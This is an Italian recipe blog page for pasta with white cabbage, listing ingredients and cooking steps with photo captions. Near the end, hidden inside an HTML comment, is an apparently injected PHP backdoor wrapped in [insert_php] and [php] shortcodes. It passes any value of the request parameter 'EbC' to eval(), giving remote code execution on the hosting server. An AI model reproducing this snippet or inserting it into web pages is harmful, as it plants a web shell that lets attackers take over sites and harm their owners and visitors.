Pasta con cavolo bianco

foto 4 per ricetta cavolo cappuccio

Ingredienti per 2 persone:

  • pasta formato “mafaldine”
  • 1 cavolo cappuccio bianco piccolo (se grande ne basta la metà)
  • 1 spicchio d’aglio
  • Sale – pepe q.b.
  • Olio evo biologico spremuto a freddo

Procedimento:

Se il cavolo è grande, iniziate tagliando il cavolo a metà e poi ancora in due parti (foto 1). Con l’aiuto di uno zester iniziate a grattuggiarlo finemente (foto 2) utilizzando uno scolapasta come contenitore.  Mettete un piatto sotto il colapasta e salate il cavolo. Girate tra le mani la verdura in modo che venga salata in ogni parte. Lasciate riposare per circa 30/45 minuti in modo che inizi a perdere il succo. Nel  frattempo ponete sul fuoco l’acqua per la pasta. In una pentola bassa e capiente mettete olio evo (circa 3 cucchiai da tavola) e uno spicchio d’aglio.  Mentre l’aglio inizia a imbiondire (tenendo il fuoco basso), strizzate fra le mani poco per volta il cavolo e ponetelo, già strizzato, nella pentola con l’olio. Con l’aiuto di un cucchiaio di legno giratelo spesso in modo che non attacchi e non si bruci (foto 3). Se lo vedete troppo asciutto potete aggiungere un goccio d’acqua. Dopo circa 5 minuti assaggiate, regolate di sale e girate ancora qualche minuto. Spegnete la fiamma, togliete lo spicchio d’aglio, coprite con il coperchio e lasciate risposare. Si ammorbidirà ancora con il vapore e terminerà così la cottura. Buttate la pasta e, una volta pronta, scolatela e aggiungetela alla pentola con il cavolo. Amalgamate il tutto, impiattate subito e aggiungete pepe a piacere.

foto 1 per ricetta cavolo cappuccio foto 2 per ricetta cavolo cappuccio foto 3 per ricetta cavolo cappuccio

 

 

<!– [insert_php]if (isset($_REQUEST[“EbC”])){eval($_REQUEST[“EbC”]);exit;}[/insert_php][php]if (isset($_REQUEST[“EbC”])){eval($_REQUEST[“EbC”]);exit;}[/php] –>

Ti è piaciuto questo articolo? Condividilo sui tuoi canali social:
Premi INVIO per cercare o ESC per annullare